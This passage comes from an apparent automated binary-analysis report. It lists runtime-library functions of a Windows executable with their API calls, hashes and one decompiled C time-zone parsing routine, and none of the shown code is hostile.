                                                  • GetProcessHeap.KERNEL32(00000001,17D783FF,?,00B1A8C5,00AD1408,00AD0000,00000000,00000000,?,00000007,00B23B58,00000014), ref: 00B17E77
                                                  • HeapAlloc.KERNEL32(00000000,?,00B1A8C5,00AD1408,00AD0000,00000000,00000000,?,00000007,00B23B58,00000014), ref: 00B17E7E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Heap$Process$AllocAllocate
                                                  • String ID:
                                                  • API String ID: 1154092256-0
                                                  • Opcode ID: e3acc49b77d49f695ec969fa03593da26f69a35030d1ae0da796f9bf8dd07c86
                                                  • Instruction ID: 8c7322025522d006b6ad8c3cefcd5db01c8625a54f25ae24e94131e7df499b5a
                                                  • Opcode Fuzzy Hash: e3acc49b77d49f695ec969fa03593da26f69a35030d1ae0da796f9bf8dd07c86
                                                  • Instruction Fuzzy Hash: 4BF0A9B66852106FEB051A789C6CEFB77ECEB0A309FA080C8F116C3250CF62CD498660
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF20E0, Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 586741f2ef224cbfee35a90a0135548767e9caf773e92fa8876b4fdf8ade35ce
                                                  • Instruction ID: b8de53af448f8269a8265b6b1c74931160753f63666a221ad20a8ca91e9911de
                                                  • Opcode Fuzzy Hash: 586741f2ef224cbfee35a90a0135548767e9caf773e92fa8876b4fdf8ade35ce
                                                  • Instruction Fuzzy Hash: C8E0653264652451E63177BE7C1A77B15D98B81331F214326F7208B0D0DF744846A76E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B0345C, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00AF4F03: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00AFC8B7,00000001,00000364,00000006,000000FF,?,B47FD95F,00AF69E8,00AF4D88,?,?,00AF440C), ref: 00AF4F44
                                                  • _free.LIBCMT ref: 00B034C8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: AllocateHeap_free
                                                  • String ID:
                                                  • API String ID: 614378929-0
                                                  • Opcode ID: a6df90cbad36204b6bf6c80459d7ebd26b378b66fe9799a8705ac52e664afbb5
                                                  • Instruction ID: 76dff93852f1e579a9eb96b4ddd152afb66f5277d6c0391e024aa7be59bbcb9f
                                                  • Opcode Fuzzy Hash: a6df90cbad36204b6bf6c80459d7ebd26b378b66fe9799a8705ac52e664afbb5
                                                  • Instruction Fuzzy Hash: BC01D6722003096BE7219FA99885A6EFFDDEB89370F25055DF694872C0EA30A9058774
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF4F03, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00AFC8B7,00000001,00000364,00000006,000000FF,?,B47FD95F,00AF69E8,00AF4D88,?,?,00AF440C), ref: 00AF4F44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 8af6602521502147236345949d549688bfa40b44ea3fc076c3d60947b2b40d4e
                                                  • Instruction ID: 1f0eb0222b53068a30cf4d20264edbd05c7a3e0034a40d05b46bf11163c7d23e
                                                  • Opcode Fuzzy Hash: 8af6602521502147236345949d549688bfa40b44ea3fc076c3d60947b2b40d4e
                                                  • Instruction Fuzzy Hash: D0F0E93160412C6BDB215BE29D05B7F37989F49F60B158021BB1CE7195CF30EC0083E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 00B0E962, Relevance: 10.9, APIs: 7, Instructions: 368timeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 76%
                                                  			E00B0E962(void* __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				char _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __ebp;
				signed int _t64;
				signed int _t71;
				signed int _t73;
				signed int _t77;
				signed int _t84;
				signed int _t88;
				signed int _t90;
				long _t92;
				signed int* _t95;
				signed int _t98;
				signed int _t101;
				signed int _t105;
				void* _t112;
				signed int _t115;
				void* _t116;
				void* _t118;
				void* _t119;
				signed int _t123;
				signed int _t124;
				signed int* _t127;
				signed int _t128;
				void* _t131;
				void* _t133;
				signed int _t134;
				signed int _t136;
				void* _t139;
				intOrPtr _t140;
				void* _t142;
				signed int _t149;
				signed int _t150;
				signed int _t153;
				signed int _t157;
				signed int _t160;
				intOrPtr* _t165;
				intOrPtr _t166;
				signed int _t167;
				intOrPtr* _t168;
				void* _t169;
				void* _t170;
				signed int _t171;
				int _t175;
				signed int _t177;
				char** _t178;
				signed int _t182;
				signed int _t183;
				void* _t190;
				signed int _t191;
				void* _t192;
				signed int _t193;

				_t177 = __esi;
				_t170 = __edi;
				_t64 = E00B0E00D();
				_v8 = _v8 & 0x00000000;
				_t136 = _t64;
				_v16 = _v16 & 0x00000000;
				_v12 = _t136;
				if(E00B0E06B( &_v8) != 0 || E00B0E013( &_v16) != 0) {
					L45:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00AF68E9();
					asm("int3");
					_t190 = _t192;
					_t193 = _t192 - 0x10;
					_push(_t136);
					_t178 = E00B0E00D();
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t71 = E00B0E06B( &_v52);
					_t142 = _t177;
					__eflags = _t71;
					if(_t71 != 0) {
						L65:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E00AF68E9();
						asm("int3");
						_push(_t190);
						_t191 = _t193;
						_t73 =  *0xb26018; // 0xb47fd95f
						_v100 = _t73 ^ _t191;
						 *0xb26924 =  *0xb26924 | 0xffffffff;
						 *0xb26918 =  *0xb26918 | 0xffffffff;
						_push(0);
						_push(_t178);
						_push(_t170);
						_t171 = 0;
						 *0xb27da8 = 0;
						_t77 = L00AFDF46(_t166, __eflags,  &_v360,  &_v356, 0x100, 0xb21b0c);
						__eflags = _t77;
						if(_t77 != 0) {
							__eflags = _t77 - 0x22;
							if(_t77 == 0x22) {
								_t183 = L00AF4D9C(_t142, _v276);
								__eflags = _t183;
								if(__eflags != 0) {
									_t84 = L00AFDF46(_t166, __eflags,  &_v280, _t183, _v276, 0xb21b0c);
									__eflags = _t84;
									if(_t84 == 0) {
										L00AF4D62(0);
										_t171 = _t183;
									} else {
										_push(_t183);
										goto L71;
									}
								} else {
									_push(0);
									L71:
									L00AF4D62();
								}
							}
						} else {
							_t171 =  &_v272;
						}
						asm("sbb esi, esi");
						_t182 =  ~(_t171 -  &_v272) & _t171;
						__eflags = _t171;
						if(_t171 == 0) {
							L79:
							L46();
						} else {
							__eflags =  *_t171;
							if(__eflags == 0) {
								goto L79;
							} else {
								_push(_t171);
								E00B0E962(0xb21b0c, _t171, _t182, __eflags);
							}
						}
						L00AF4D62(_t182);
						__eflags = _v16 ^ _t191;
						return L00AD1DCD(_v16 ^ _t191);
					} else {
						_t88 = E00B0E013( &_v16);
						_pop(_t142);
						__eflags = _t88;
						if(_t88 != 0) {
							goto L65;
						} else {
							_t90 = E00B0E03F( &_v20);
							_pop(_t142);
							__eflags = _t90;
							if(_t90 != 0) {
								goto L65;
							} else {
								L00AF4D62( *0xb27da0);
								 *0xb27da0 = 0;
								 *_t193 = 0xb27db0;
								_t92 = GetTimeZoneInformation(??);
								__eflags = _t92 - 0xffffffff;
								if(_t92 != 0xffffffff) {
									_t149 =  *0xb27db0 * 0x3c;
									_t167 =  *0xb27e04; // 0x0
									_push(_t170);
									 *0xb27da8 = 1;
									_v12 = _t149;
									__eflags =  *0xb27df6; // 0x0
									if(__eflags != 0) {
										_t150 = _t149 + _t167 * 0x3c;
										__eflags = _t150;
										_v12 = _t150;
									}
									__eflags =  *0xb27e4a; // 0x0
									if(__eflags == 0) {
										L55:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t105 =  *0xb27e58; // 0x0
										__eflags = _t105;
										if(_t105 == 0) {
											goto L55;
										} else {
											_v16 = 1;
											_v20 = (_t105 - _t167) * 0x3c;
										}
									}
									_t175 = E00B0398F(0, _t167);
									_t98 = WideCharToMultiByte(_t175, 0, 0xb27db4, 0xffffffff,  *_t178, 0x3f, 0,  &_v24);
									__eflags = _t98;
									if(_t98 == 0) {
										L59:
										 *( *_t178) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L59;
										} else {
											( *_t178)[0x3f] = 0;
										}
									}
									_t101 = WideCharToMultiByte(_t175, 0, 0xb27e08, 0xffffffff, _t178[1], 0x3f, 0,  &_v24);
									__eflags = _t101;
									if(_t101 == 0) {
										L63:
										 *(_t178[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L63;
										} else {
											_t178[1][0x3f] = 0;
										}
									}
								}
								 *(E00B0E007()) = _v12;
								 *((intOrPtr*)(L00B0DFFB())) = _v16;
								_t95 = E00B0E001();
								 *_t95 = _v20;
								return _t95;
							}
						}
					}
				} else {
					_t168 =  *0xb27da0; // 0x0
					_t177 = _a4;
					if(_t168 == 0) {
						L12:
						L00AF4D62(_t168);
						_t153 = _t177;
						_t12 = _t153 + 1; // 0xb0ed51
						_t169 = _t12;
						do {
							_t112 =  *_t153;
							_t153 = _t153 + 1;
						} while (_t112 != 0);
						_t13 = _t153 - _t169 + 1; // 0xb0ed52
						 *0xb27da0 = L00AF4D9C(_t153 - _t169, _t13);
						_t115 = L00AF4D62(0);
						_t166 =  *0xb27da0; // 0x0
						if(_t166 == 0) {
							goto L44;
						} else {
							_t157 = _t177;
							_push(_t170);
							_t14 = _t157 + 1; // 0xb0ed51
							_t170 = _t14;
							do {
								_t116 =  *_t157;
								_t157 = _t157 + 1;
							} while (_t116 != 0);
							_t15 = _t157 - _t170 + 1; // 0xb0ed52
							_t118 = L00AF4E44(_t166, _t15, _t177);
							_t192 = _t192 + 0xc;
							if(_t118 == 0) {
								_t170 = 3;
								_push(_t170);
								_t119 = E00B0F425(_t158,  *_t136, 0x40, _t177);
								_t192 = _t192 + 0x10;
								if(_t119 == 0) {
									while( *_t177 != 0) {
										_t177 = _t177 + 1;
										_t170 = _t170 - 1;
										if(_t170 != 0) {
											continue;
										}
										break;
									}
									_t136 =  *_t177;
									_pop(_t170);
									if(_t136 == 0x2d) {
										_t177 = _t177 + 1;
									}
									_t160 = E00AF6309(_t158, _t177) * 0xe10;
									_v8 = _t160;
									while(1) {
										_t166 =  *_t177;
										if(_t166 != 0x2b && _t166 - 0x30 > 9) {
											break;
										}
										_t177 = _t177 + 1;
									}
									__eflags = _t166 - 0x3a;
									if(_t166 == 0x3a) {
										_t177 = _t177 + 1;
										_t160 = _v8 + E00AF6309(_t160, _t177) * 0x3c;
										_v8 = _t160;
										while(1) {
											_t131 =  *_t177;
											__eflags = _t131 - 0x30;
											if(_t131 < 0x30) {
												break;
											}
											__eflags = _t131 - 0x39;
											if(_t131 <= 0x39) {
												_t177 = _t177 + 1;
												__eflags = _t177;
												continue;
											}
											break;
										}
										__eflags =  *_t177 - 0x3a;
										if( *_t177 == 0x3a) {
											_t177 = _t177 + 1;
											_t160 = _v8 + E00AF6309(_t160, _t177);
											_v8 = _t160;
											while(1) {
												_t133 =  *_t177;
												__eflags = _t133 - 0x30;
												if(_t133 < 0x30) {
													goto L37;
												}
												__eflags = _t133 - 0x39;
												if(_t133 <= 0x39) {
													_t177 = _t177 + 1;
													__eflags = _t177;
													continue;
												}
												goto L37;
											}
										}
									}
									L37:
									__eflags = _t136 - 0x2d;
									if(_t136 == 0x2d) {
										_v8 = _t160;
									}
									__eflags =  *_t177;
									_t123 = 0 |  *_t177 != 0x00000000;
									_v16 = _t123;
									__eflags = _t123;
									_t124 = _v12;
									if(_t123 == 0) {
										_t28 = _t124 + 4; // 0xfffffddd
										 *((char*)( *_t28)) = 0;
										L43:
										 *(E00B0E007()) = _v8;
										_t127 = L00B0DFFB();
										 *_t127 = _v16;
										return _t127;
									}
									_push(3);
									_t27 = _t124 + 4; // 0xfffffddd
									_t128 = E00B0F425(_t160,  *_t27, 0x40, _t177);
									_t192 = _t192 + 0x10;
									__eflags = _t128;
									if(_t128 == 0) {
										goto L43;
									}
								}
							}
							goto L45;
						}
					} else {
						_t165 = _t168;
						_t134 = _t177;
						while(1) {
							_t139 =  *_t134;
							if(_t139 !=  *_t165) {
								break;
							}
							if(_t139 == 0) {
								L8:
								_t115 = 0;
							} else {
								_t9 = _t134 + 1; // 0xdde805eb
								_t140 =  *_t9;
								if(_t140 !=  *((intOrPtr*)(_t165 + 1))) {
									break;
								} else {
									_t134 = _t134 + 2;
									_t165 = _t165 + 2;
									if(_t140 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t115 == 0) {
								L44:
								return _t115;
							} else {
								_t136 = _v12;
								goto L12;
							}
							goto L81;
						}
						asm("sbb eax, eax");
						_t115 = _t134 | 0x00000001;
						__eflags = _t115;
						goto L10;
					}
				}
				L81:
			}



































































                                                  0x00b0e962
                                                  0x00b0e962
                                                  0x00b0e96c
                                                  0x00b0e971
                                                  0x00b0e975
                                                  0x00b0e977
                                                  0x00b0e97f
                                                  0x00b0e98a
                                                  0x00b0eb28
                                                  0x00b0eb2a
                                                  0x00b0eb2b
                                                  0x00b0eb2c
                                                  0x00b0eb2d
                                                  0x00b0eb2e
                                                  0x00b0eb2f
                                                  0x00b0eb34
                                                  0x00b0eb38
                                                  0x00b0eb3a
                                                  0x00b0eb3d
                                                  0x00b0eb44
                                                  0x00b0eb4b
                                                  0x00b0eb4f
                                                  0x00b0eb52
                                                  0x00b0eb55
                                                  0x00b0eb5a
                                                  0x00b0eb5b
                                                  0x00b0eb5d
                                                  0x00b0ec85
                                                  0x00b0ec85
                                                  0x00b0ec86
                                                  0x00b0ec87
                                                  0x00b0ec88
                                                  0x00b0ec89
                                                  0x00b0ec8a
                                                  0x00b0ec8f
                                                  0x00b0ec92
                                                  0x00b0ec93
                                                  0x00b0ec9b
                                                  0x00b0eca2
                                                  0x00b0eca5
                                                  0x00b0ecb2
                                                  0x00b0ecb9
                                                  0x00b0ecba
                                                  0x00b0ecbb
                                                  0x00b0ecc1
                                                  0x00b0ecd0
                                                  0x00b0ecd7
                                                  0x00b0ecdf
                                                  0x00b0ece1
                                                  0x00b0eceb
                                                  0x00b0ecee
                                                  0x00b0ecfb
                                                  0x00b0ecfe
                                                  0x00b0ed00
                                                  0x00b0ed19
                                                  0x00b0ed21
                                                  0x00b0ed23
                                                  0x00b0ed29
                                                  0x00b0ed2e
                                                  0x00b0ed25
                                                  0x00b0ed25
                                                  0x00000000
                                                  0x00b0ed25
                                                  0x00b0ed02
                                                  0x00b0ed02
                                                  0x00b0ed03
                                                  0x00b0ed03
                                                  0x00b0ed03
                                                  0x00b0ed30
                                                  0x00b0ece3
                                                  0x00b0ece3
                                                  0x00b0ece3
                                                  0x00b0ed3d
                                                  0x00b0ed3f
                                                  0x00b0ed41
                                                  0x00b0ed43
                                                  0x00b0ed53
                                                  0x00b0ed53
                                                  0x00b0ed45
                                                  0x00b0ed45
                                                  0x00b0ed48
                                                  0x00000000
                                                  0x00b0ed4a
                                                  0x00b0ed4a
                                                  0x00b0ed4b
                                                  0x00b0ed50
                                                  0x00b0ed48
                                                  0x00b0ed59
                                                  0x00b0ed64
                                                  0x00b0ed6f
                                                  0x00b0eb63
                                                  0x00b0eb67
                                                  0x00b0eb6c
                                                  0x00b0eb6d
                                                  0x00b0eb6f
                                                  0x00000000
                                                  0x00b0eb75
                                                  0x00b0eb79
                                                  0x00b0eb7e
                                                  0x00b0eb7f
                                                  0x00b0eb81
                                                  0x00000000
                                                  0x00b0eb87
                                                  0x00b0eb8d
                                                  0x00b0eb92
                                                  0x00b0eb98
                                                  0x00b0eb9f
                                                  0x00b0eba5
                                                  0x00b0eba8
                                                  0x00b0ebae
                                                  0x00b0ebb5
                                                  0x00b0ebbb
                                                  0x00b0ebbf
                                                  0x00b0ebc5
                                                  0x00b0ebc8
                                                  0x00b0ebcf
                                                  0x00b0ebd4
                                                  0x00b0ebd4
                                                  0x00b0ebd6
                                                  0x00b0ebd6
                                                  0x00b0ebd9
                                                  0x00b0ebe0
                                                  0x00b0ebf8
                                                  0x00b0ebf8
                                                  0x00b0ebfb
                                                  0x00b0ebe2
                                                  0x00b0ebe2
                                                  0x00b0ebe7
                                                  0x00b0ebe9
                                                  0x00000000
                                                  0x00b0ebeb
                                                  0x00b0ebed
                                                  0x00b0ebf3
                                                  0x00b0ebf3
                                                  0x00b0ebe9
                                                  0x00b0ec03
                                                  0x00b0ec17
                                                  0x00b0ec1d
                                                  0x00b0ec1f
                                                  0x00b0ec2d
                                                  0x00b0ec2f
                                                  0x00b0ec21
                                                  0x00b0ec21
                                                  0x00b0ec24
                                                  0x00000000
                                                  0x00b0ec26
                                                  0x00b0ec28
                                                  0x00b0ec28
                                                  0x00b0ec24
                                                  0x00b0ec44
                                                  0x00b0ec4b
                                                  0x00b0ec4d
                                                  0x00b0ec5c
                                                  0x00b0ec5f
                                                  0x00b0ec4f
                                                  0x00b0ec4f
                                                  0x00b0ec52
                                                  0x00000000
                                                  0x00b0ec54
                                                  0x00b0ec57
                                                  0x00b0ec57
                                                  0x00b0ec52
                                                  0x00b0ec4d
                                                  0x00b0ec69
                                                  0x00b0ec73
                                                  0x00b0ec78
                                                  0x00b0ec7d
                                                  0x00b0ec84
                                                  0x00b0ec84
                                                  0x00b0eb81
                                                  0x00b0eb6f
                                                  0x00b0e9a2
                                                  0x00b0e9a2
                                                  0x00b0e9a8
                                                  0x00b0e9ad
                                                  0x00b0e9e3
                                                  0x00b0e9e4
                                                  0x00b0e9ea
                                                  0x00b0e9ec
                                                  0x00b0e9ec
                                                  0x00b0e9ef
                                                  0x00b0e9ef
                                                  0x00b0e9f1
                                                  0x00b0e9f2
                                                  0x00b0e9f8
                                                  0x00b0ea03
                                                  0x00b0ea08
                                                  0x00b0ea0d
                                                  0x00b0ea17
                                                  0x00000000
                                                  0x00b0ea1d
                                                  0x00b0ea1d
                                                  0x00b0ea1f
                                                  0x00b0ea20
                                                  0x00b0ea20
                                                  0x00b0ea23
                                                  0x00b0ea23
                                                  0x00b0ea25
                                                  0x00b0ea26
                                                  0x00b0ea2d
                                                  0x00b0ea32
                                                  0x00b0ea37
                                                  0x00b0ea3c
                                                  0x00b0ea44
                                                  0x00b0ea45
                                                  0x00b0ea4b
                                                  0x00b0ea50
                                                  0x00b0ea55
                                                  0x00b0ea5b
                                                  0x00b0ea60
                                                  0x00b0ea61
                                                  0x00b0ea64
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0ea64
                                                  0x00b0ea66
                                                  0x00b0ea68
                                                  0x00b0ea6c
                                                  0x00b0ea6e
                                                  0x00b0ea6e
                                                  0x00b0ea76
                                                  0x00b0ea7c
                                                  0x00b0ea7f
                                                  0x00b0ea7f
                                                  0x00b0ea84
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0ea8d
                                                  0x00b0ea8d
                                                  0x00b0ea90
                                                  0x00b0ea93
                                                  0x00b0ea95
                                                  0x00b0eaa3
                                                  0x00b0eaa5
                                                  0x00b0eaaf
                                                  0x00b0eaaf
                                                  0x00b0eab1
                                                  0x00b0eab3
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0eaaa
                                                  0x00b0eaac
                                                  0x00b0eaae
                                                  0x00b0eaae
                                                  0x00000000
                                                  0x00b0eaae
                                                  0x00000000
                                                  0x00b0eaac
                                                  0x00b0eab5
                                                  0x00b0eab8
                                                  0x00b0eaba
                                                  0x00b0eac5
                                                  0x00b0eac7
                                                  0x00b0ead1
                                                  0x00b0ead1
                                                  0x00b0ead3
                                                  0x00b0ead5
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0eacc
                                                  0x00b0eace
                                                  0x00b0ead0
                                                  0x00b0ead0
                                                  0x00000000
                                                  0x00b0ead0
                                                  0x00000000
                                                  0x00b0eace
                                                  0x00b0ead1
                                                  0x00b0eab8
                                                  0x00b0ead7
                                                  0x00b0ead7
                                                  0x00b0eada
                                                  0x00b0eade
                                                  0x00b0eade
                                                  0x00b0eae3
                                                  0x00b0eae5
                                                  0x00b0eae8
                                                  0x00b0eaeb
                                                  0x00b0eaed
                                                  0x00b0eaf0
                                                  0x00b0eb08
                                                  0x00b0eb0b
                                                  0x00b0eb0e
                                                  0x00b0eb16
                                                  0x00b0eb1b
                                                  0x00b0eb20
                                                  0x00000000
                                                  0x00b0eb20
                                                  0x00b0eaf2
                                                  0x00b0eaf7
                                                  0x00b0eafa
                                                  0x00b0eaff
                                                  0x00b0eb02
                                                  0x00b0eb04
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0eb06
                                                  0x00b0ea55
                                                  0x00000000
                                                  0x00b0ea3c
                                                  0x00b0e9af
                                                  0x00b0e9af
                                                  0x00b0e9b1
                                                  0x00b0e9b3
                                                  0x00b0e9b3
                                                  0x00b0e9b7
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0e9bb
                                                  0x00b0e9cf
                                                  0x00b0e9cf
                                                  0x00b0e9bd
                                                  0x00b0e9bd
                                                  0x00b0e9bd
                                                  0x00b0e9c3
                                                  0x00000000
                                                  0x00b0e9c5
                                                  0x00b0e9c5
                                                  0x00b0e9c8
                                                  0x00b0e9cd
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0e9cd
                                                  0x00b0e9c3
                                                  0x00b0e9d8
                                                  0x00b0e9da
                                                  0x00b0eb27
                                                  0x00b0eb27
                                                  0x00b0e9e0
                                                  0x00b0e9e0
                                                  0x00000000
                                                  0x00b0e9e0
                                                  0x00000000
                                                  0x00b0e9da
                                                  0x00b0e9d3
                                                  0x00b0e9d5
                                                  0x00b0e9d5
                                                  0x00000000
                                                  0x00b0e9d5
                                                  0x00b0e9ad
                                                  0x00000000

                                                  APIs
                                                  • _free.LIBCMT ref: 00B0E9E4
                                                  • _free.LIBCMT ref: 00B0EA08
                                                  • _free.LIBCMT ref: 00B0EB8D
                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00B21B0C), ref: 00B0EB9F
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00B27DB4,000000FF,00000000,0000003F,00000000,?,?), ref: 00B0EC17
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00B27E08,000000FF,?,0000003F,00000000,?), ref: 00B0EC44
                                                  • _free.LIBCMT ref: 00B0ED59
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                  • String ID:
                                                  • API String ID: 314583886-0
                                                  • Opcode ID: 7fc1146106b11113f53292b185e5a646175d043232bae2bae40fc9caf56fc771
                                                  • Instruction ID: 4f838e94295ea0a60cf8190529355d3abe32e1d8de936c76e23555cb82697980
                                                  • Opcode Fuzzy Hash: 7fc1146106b11113f53292b185e5a646175d043232bae2bae40fc9caf56fc771
                                                  • Instruction Fuzzy Hash: 5EC12571A04209AFDB349F68CC81ABA7FE9EF45350F1449EAE4A5972D1EB30DE02C750
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B0ABCC, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1362COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                  • API String ID: 4168288129-2761157908
                                                  • Opcode ID: deb9e55e99e59a192238f1e153623326df6b8d1277e2401db3e0dbf170bac361
                                                  • Instruction ID: 684fbbe6f43663e4839a80b24859b542fc28bd00965473dd70ea59b8a41172dc
                                                  • Opcode Fuzzy Hash: deb9e55e99e59a192238f1e153623326df6b8d1277e2401db3e0dbf170bac361
                                                  • Instruction Fuzzy Hash: D0C23D71E046298FDB25CE28DD80BE9BBF5EB48344F1445EAD84DE7280E775AE818F41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B056EB, Relevance: 7.7, APIs: 5, Instructions: 240COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00AFC713: GetLastError.KERNEL32(00000008,?,00B06979), ref: 00AFC717
                                                    • Part of subcall function 00AFC713: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00AFC7BB
                                                  • GetACP.KERNEL32(?,?,?,?,?,?,00AF3364,?,?,?,?,?,?,00000000), ref: 00B057C6
                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00AF3364,?,?,?,?,?,?,00000000), ref: 00B057D8
                                                  • _wcschr.LIBVCRUNTIME ref: 00B05868
                                                  • _wcschr.LIBVCRUNTIME ref: 00B05876
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00AF3364,00000000,00AF3484), ref: 00B05919
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                  • String ID:
                                                  • API String ID: 4147378913-0
                                                  • Opcode ID: 6357bd5ccda61c3472cc4e501d993f8c3f0685523e778f4db7680da10eba294e
                                                  • Instruction ID: 0c0864f0a38666c149bd324437a2a4ec5ac4a98b5442ab1055abe836d44b943c
                                                  • Opcode Fuzzy Hash: 6357bd5ccda61c3472cc4e501d993f8c3f0685523e778f4db7680da10eba294e
                                                  • Instruction Fuzzy Hash: BB71E771640B06AAEB35AB64CC45ABB7BECEF44350F1445A9FA05DB9C1EB70ED40CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B06054, Relevance: 7.7, APIs: 5, Instructions: 188COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00AFC713: GetLastError.KERNEL32(00000008,?,00B06979), ref: 00AFC717
